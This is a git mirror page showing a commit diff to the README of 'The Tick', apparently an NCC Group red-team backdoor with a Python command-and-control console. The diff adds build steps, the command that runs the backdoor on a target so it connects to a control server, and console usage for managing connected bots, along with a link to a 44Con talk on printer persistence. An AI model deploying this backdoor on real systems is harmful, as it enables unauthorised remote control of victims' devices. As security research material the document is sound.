0
0
Fork 0
mirror of https://github.com/nccgroup/thetick.git synced 2023-12-14 04:33:00 +01:00

Added 44Con presentation + expanded the readme a bit. Fixes #1

This commit is contained in:
MarioVilas 2019-09-27 10:51:29 +02:00
parent 576e7fc233
commit c6d26aad34

View file

@ -14,17 +14,30 @@ sudo apt-get install libcurl-dev
Once the dependencies are installed just run the makefile:
```
cd src
make clean
make
```
When cross-compiling for supported platforms, the dependency resolution and compilation is done automatically for you. Currently the only supported cross-compiling platform is the Lexmark CX310DN printer. Consult the sources for more details.
Once the "make" command has run to completion, the compiled binary can be found at the "bin" folder. This is the binary you want to run on your target machine to control it remotely.
When cross-compiling for supported platforms, the dependency resolution and compilation is done automatically for you. Currently the only supported cross-compiling platform is the Lexmark CX310DN printer, but more devices will be added later. Consult the makefile for more details.
The command and control console is written in Python and therefore needs not be compiled.
## Installing
Obtaining persistence on the backdoor will depend heavily on the target platform, and therefore is not documented here.
The control console requires no installation, but may have unresolved dependencies. Run the following command to ensure all dependencies are properly installed (note this does not need sudo):
On the target machine, run the backdoor binary with the following arguments:
```
./ticksvc ADDR PORT
```
Where "ADDR" and "PORT" must be replaced by the IP address and port where the command and console will be listening. The default port is 5555.
The command and control console requires no installation, but may have unresolved dependencies. Run the following command to ensure all dependencies are properly installed (note this does not need sudo):
```
pip install --upgrade -r requirements.txt
@ -56,10 +69,31 @@ To run the backdoor binary on the target platform, set the control server hostna
./ticksvc control.example-domain.com 5555
```
At the control server, you may want to run the console inside a GNU screen instance or similar. Here are a few screenshots illustrating what the console is capable of:
At the control server, you may want to run the console inside a GNU screen instance or similar:
```
sudo apt-get install screen
screen -S thetick ./thetick.py
```
That way you can detach from the console by pressing Control+A followed by D. You can return to the console later like this:
```
screen -r thetick
```
The console will let you know when a new bot connects to it. Use the "bots" command to show the currently connected bots, and the "use" command will select a bot to work with. The "help" command shows the user manual.
Here are a few screenshots illustrating what the console is capable of:
Command line switches
![Screenshot 2](doc/screenshot-banners.png "Screenshot")
Interactive console help
![Screenshot 3](doc/screenshot-help.png "Screenshot")
## Media
The Tick has been referenced in the following 44Con presentation by Daniel Romero and Mario Rivas:
[![](http://img.youtube.com/vi/plu7U0Sq9HQ/0.jpg)](http://www.youtube.com/watch?v=plu7U0Sq9HQ "Office Equipment: The Front Door To Persistence On Enterprise Networks - D. Romero and M. Rivas")